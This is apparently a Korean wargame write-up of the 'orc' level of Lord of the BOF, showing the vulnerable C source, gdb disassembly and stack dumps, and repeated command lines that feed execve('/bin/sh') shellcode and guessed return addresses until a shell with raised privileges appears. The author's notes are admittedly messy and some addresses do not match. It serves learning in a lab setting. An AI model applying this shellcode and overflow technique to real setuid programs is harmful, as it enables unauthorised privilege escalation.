
/* 1. 소스코드를 확인합니다. */

/* 소스코드를 복사해 복사본을 만들어주시기 바랍니다. 여기서는 orx가 그 경우입니다.*/

[goblin@localhost goblin]$ cat orc.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - orc

        - egghunter

*/


#include <stdio.h>

#include <stdlib.h>


extern char **environ;


main(int argc, char *argv[])   /* implicit int return (pre-C99 style); note the file never
                                  includes <string.h>, so memset/strlen/strcpy are implicitly
                                  declared here */

{

char buffer[40];   /* 40-byte stack buffer; in the disassembly below it lives at ebp-0x28 */

int i;


if(argc < 2){

printf("argv error\n");

exit(0);

}


// egghunter 
/* Zero every environment string before anything else happens, so nothing
 * that was placed in the environment survives into the rest of main.
 * This is the "egghunter" mitigation named in the file header. */

for(i=0; environ[i]; i++)

memset(environ[i], 0, strlen(environ[i]));


/* Reads byte 47 of argv[1] without checking its length first, so a short
 * argument makes this an out-of-bounds read. Offset 47 is already past the
 * end of the 40-byte buffer (it lies in the saved frame above it); the test
 * constrains that single byte and is not a bounds check on the copy below. */
if(argv[1][47] != '\xbf')

{

printf("stack is still your friend.\n");

exit(0);

}


/* Unbounded copy of untrusted argv[1] into a 40-byte buffer: any argument of
 * 40 or more bytes overruns buffer and the saved frame above it. A hardened
 * version would bound the copy (e.g. snprintf(buffer, sizeof buffer, "%s",
 * argv[1])) and reject overlong input explicitly. */
strcpy(buffer, argv[1]); 

printf("%s\n", buffer);

}


/* 2. \xff가 인식되도록 bash2를 사용합니다. */

[goblin@localhost goblin]$ bash2


/* 3. 그냥 찾다가 얻은 리턴어드레스로 해봅니다.*/

[goblin@localhost goblin]$ ./orc `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\x90"x11'` `perl -e 'print "\x90"x9, "\xac\xfa\xff\xbf"'` 

j

 X?Rh//shh/bin??S?訴€??????????? //안되네여.


/* 4. gdb로 까서 주소를 얻어보았습니다. call strcpy에 브포를 걸고 `perl -e 'print"\x90"x47, "\xbf"'`이런식으로 48번째 바이트에 \xbf를 넣고 구경하다보니 나왔습니다(기억안남ㅋ;;;) */

[goblin@localhost goblin]$ ./orx `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\x90"x11,"\x90"x10, "\x48\xfc\xff\xbf"'` 

j

 X?Rh//shh/bin??S?訴€?????????????????????H?

Illegal instruction (core dumped)


[goblin@localhost goblin]$ gdb -q orx 

(gdb) disas main

Dump of assembler code for function main:

0x8048500 <main>: push   %ebp

0x8048501 <main+1>: mov    %esp,%ebp

0x8048503 <main+3>: sub    $0x2c,%esp

0x8048506 <main+6>: cmpl   $0x1,0x8(%ebp)

0x804850a <main+10>: jg     0x8048523 <main+35>

0x804850c <main+12>: push   $0x8048640

0x8048511 <main+17>: call   0x8048410 <printf>

0x8048516 <main+22>: add    $0x4,%esp

0x8048519 <main+25>: push   $0x0

0x804851b <main+27>: call   0x8048420 <exit>

0x8048520 <main+32>: add    $0x4,%esp

0x8048523 <main+35>: nop    

0x8048524 <main+36>: movl   $0x0,0xffffffd4(%ebp)

0x804852b <main+43>: nop    

0x804852c <main+44>: lea    0x0(%esi,1),%esi

0x8048530 <main+48>: mov    0xffffffd4(%ebp),%eax

0x8048533 <main+51>: lea    0x0(,%eax,4),%edx

0x804853a <main+58>: mov    0x8049764,%eax

0x804853f <main+63>:         cmpl   $0x0,(%eax,%edx,1)

0x8048543 <main+67>: jne    0x8048547 <main+71>

0x8048545 <main+69>: jmp    0x8048587 <main+135>

0x8048547 <main+71>: mov    0xffffffd4(%ebp),%eax

0x804854a <main+74>: lea    0x0(,%eax,4),%edx

0x8048551 <main+81>: mov    0x8049764,%eax

0x8048556 <main+86>: mov    (%eax,%edx,1),%edx

0x8048559 <main+89>: push   %edx

0x804855a <main+90>: call   0x80483f0 <strlen>

0x804855f <main+95>:  add    $0x4,%esp

0x8048562 <main+98>: mov    %eax,%eax

0x8048564 <main+100>: push   %eax

0x8048565 <main+101>: push   $0x0

0x8048567 <main+103>: mov    0xffffffd4(%ebp),%eax

---Type <return> to continue, or q <return> to quit---

0x804856a <main+106>: lea    0x0(,%eax,4),%edx

0x8048571 <main+113>: mov    0x8049764,%eax

0x8048576 <main+118>: mov    (%eax,%edx,1),%edx

0x8048579 <main+121>: push   %edx

0x804857a <main+122>: call   0x8048430 <memset>

0x804857f <main+127>: add    $0xc,%esp

0x8048582 <main+130>: incl   0xffffffd4(%ebp)

0x8048585 <main+133>: jmp    0x8048530 <main+48>

0x8048587 <main+135>: mov    0xc(%ebp),%eax

0x804858a <main+138>: add    $0x4,%eax

0x804858d <main+141>: mov    (%eax),%edx

0x804858f <main+143>: add    $0x2f,%edx

0x8048592 <main+146>: cmpb   $0xbf,(%edx)

0x8048595 <main+149>: je     0x80485b0 <main+176>

0x8048597 <main+151>: push   $0x804864c

0x804859c <main+156>: call   0x8048410 <printf>

0x80485a1 <main+161>: add    $0x4,%esp

0x80485a4 <main+164>: push   $0x0

0x80485a6 <main+166>: call   0x8048420 <exit>

0x80485ab <main+171>: add    $0x4,%esp

0x80485ae <main+174>: mov    %esi,%esi

0x80485b0 <main+176>: mov    0xc(%ebp),%eax

0x80485b3 <main+179>: add    $0x4,%eax

0x80485b6 <main+182>: mov    (%eax),%edx

0x80485b8 <main+184>: push   %edx

0x80485b9 <main+185>: lea    0xffffffd8(%ebp),%eax

0x80485bc <main+188>: push   %eax

0x80485bd <main+189>: call   0x8048440 <strcpy>

0x80485c2 <main+194>: add    $0x8,%esp

0x80485c5 <main+197>: lea    0xffffffd8(%ebp),%eax

0x80485c8 <main+200>: push   %eax

0x80485c9 <main+201>: push   $0x8048669

0x80485ce <main+206>: call   0x8048410 <printf>

---Type <return> to continue, or q <return> to quit---

0x80485d3 <main+211>: add    $0x8,%esp

0x80485d6 <main+214>: lea    0xffffffd8(%ebp),%eax

0x80485d9 <main+217>: push   %eax

0x80485da <main+218>: push   $0x804866d

0x80485df <main+223>: call   0x8048410 <printf>

0x80485e4 <main+228>: add    $0x8,%esp

0x80485e7 <main+231>: leave  

0x80485e8 <main+232>: ret    

0x80485e9 <main+233>: nop    

0x80485ea <main+234>: nop    

0x80485eb <main+235>: nop    

0x80485ec <main+236>: nop    

0x80485ed <main+237>: nop    

0x80485ee <main+238>: nop    

0x80485ef <main+239>: nop    

End of assembler dump.


/* 5. strcpy 브포. */

(gdb) b *main+189

Breakpoint 1 at 0x80485bd

(gdb) r `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\x90"x11,"\x90"x10, "\x65\xfc\x90\xbf"'`

Starting program: /home/goblin/orx `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\x90"x11,"\x90"x10, "\x65\xfc\x90\xbf"'`


Breakpoint 1, 0x80485bd in main ()

(gdb) x/50wx $esp

0xbffffb6c: 0xbffffdbd    0xbffffddb    0xbffffdf3     0xbffffdfe

0xbffffb7c: 0xbffffe0f     0xbffffe20    0xbffffe28     0x00000000

0xbffffb8c: 0x00000003 0x08048034 0x00000004 0x00000020

0xbffffb9c: 0x00000005 0x00000006 0x00000006 0x00001000

0xbffffbac: 0x00000007 0x40000000 0x00000008 0x00000000

0xbffffbbc: 0x00000009 0x08048450 0x0000000b 0x000001f7

0xbffffbcc: 0x0000000c 0x000001f7 0x0000000d 0x000001f7

0xbffffbdc: 0x0000000e 0x000001f7 0x00000010 0x0febfbff

0xbffffbec: 0x0000000f 0xbffffc1e     0x00000000 0x00000000

0xbffffbfc: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc0c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc1c: 0x36690000 0x2f003638 0x656d6f68 0x626f672f

0xbffffc2c: 0x2f6e696c 0x0078726f

(gdb) 

0xbffffc34: 0x99580b6a    0x2f2f6852     0x2f686873  0x896e6962 //쉘코드가요기잉네

0xbffffc44: 0x895352e3   0x9080cde1 0x90909090 0x90909090  //0xbffffc34?35?

0xbffffc54: 0x90909090 0x90909090 0x90909090 0xbf90fc65

0xbffffc64: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc74: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc84: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc94: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffca4: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffcb4: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffcc4: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffcd4: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffce4: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffcf4: 0x00000000 0x00000000

(gdb) quit

The program is running.  Exit anyway? (y or n) y


/* 6. 복사본에 시도해봅니다.*/

[goblin@localhost goblin]$ ./orx `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\x90"x11,"\x90"x10, "\x35\xfc\xff\xbf"'` 

j

 X?Rh//shh/bin??S?訴€?????????????????????5?

bash$         //오옹 되넹

bash$ exit

exit


/* 7. 원본에 시도해봅니다. */

[goblin@localhost goblin]$ ./orc `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\x90"x11,"\x90"x10, "\x35\xfc\xff\xbf"'` 

j

 X?Rh//shh/bin??S?訴€?????????????????????5?

Segmentation fault            //안되네여 하핳ㅎ하핳하하핳

[goblin@localhost goblin]$ ./orc `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\x90"x11,"\x90"x10, "\x34\xfc\xff\xbf"'` 

j

 X?Rh//shh/bin??S?訴€?????????????????????4?

Illegal instruction


/*이 시점에선 그냥 34~40까지 해보자 하고 끝값을 마구마구 대입했습니다*/

[goblin@localhost goblin]$ ./orc `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\x90"x11,"\x90"x10, "\x33\xfc\xff\xbf"'` 

j

 X?Rh//shh/bin??S?訴€?????????????????????3?

Segmentation fault

[goblin@localhost goblin]$ ./orc `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\x90"x11,"\x90"x10, "\x36\xfc\xff\xbf"'` 

j

 X?Rh//shh/bin??S?訴€?????????????????????6?

Illegal instruction

[goblin@localhost goblin]$ ./orc `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\x90"x11,"\x90"x10, "\x37\xfc\xff\xbf"'` 

j

 X?Rh//shh/bin??S?訴€?????????????????????7?

bash$ my-pass        //결국엔 됬어요.

euid = 504


아하하하하하하 굉장히 많은것을 배웠습니다

gdb에 대한 공포감도 줄이고, 알아낸게 많은 것 같습니다.

중간중간에 좀 안맞지만 (하도 오랫동안 삽질해서 날아간게 좀 많아요) 그래도 뼈대는 있네여. 고치면서 본건데 기억안나는것도 많고,,, 다음에 시간나면 다시 해봐야겠습니다.

이거 푸는동안 조언주신 많은 분들께 감사합니다!

기분좋네요ㅎㅎ


NOTES:


버퍼의 크기는 44

48번째 바이트는 \xbf여야 한다


코어는 해당 프로그램이 관리자 권한이 아닐 때 덤프가 떠지지 않는다

음 망했어


0xbffffc48

0xbffffc65

          28

          34

          35


48번째 바이트가 \xbf여야 하니까 3바이트 빼면 45바이트니까 환경변수 4바이트 nop 41바이트

gdb에서 \xff는 인식되지 않는다아앙ㅇ아ㅏㅇ


ㅋㅋ 정신나간 노트가 많습니다. 저 주소값들 어쩔꺼야;;

그래도 풀으니까 속시원하네여. 삽질한 성과가 있는것 같습니다ㅋㅋ
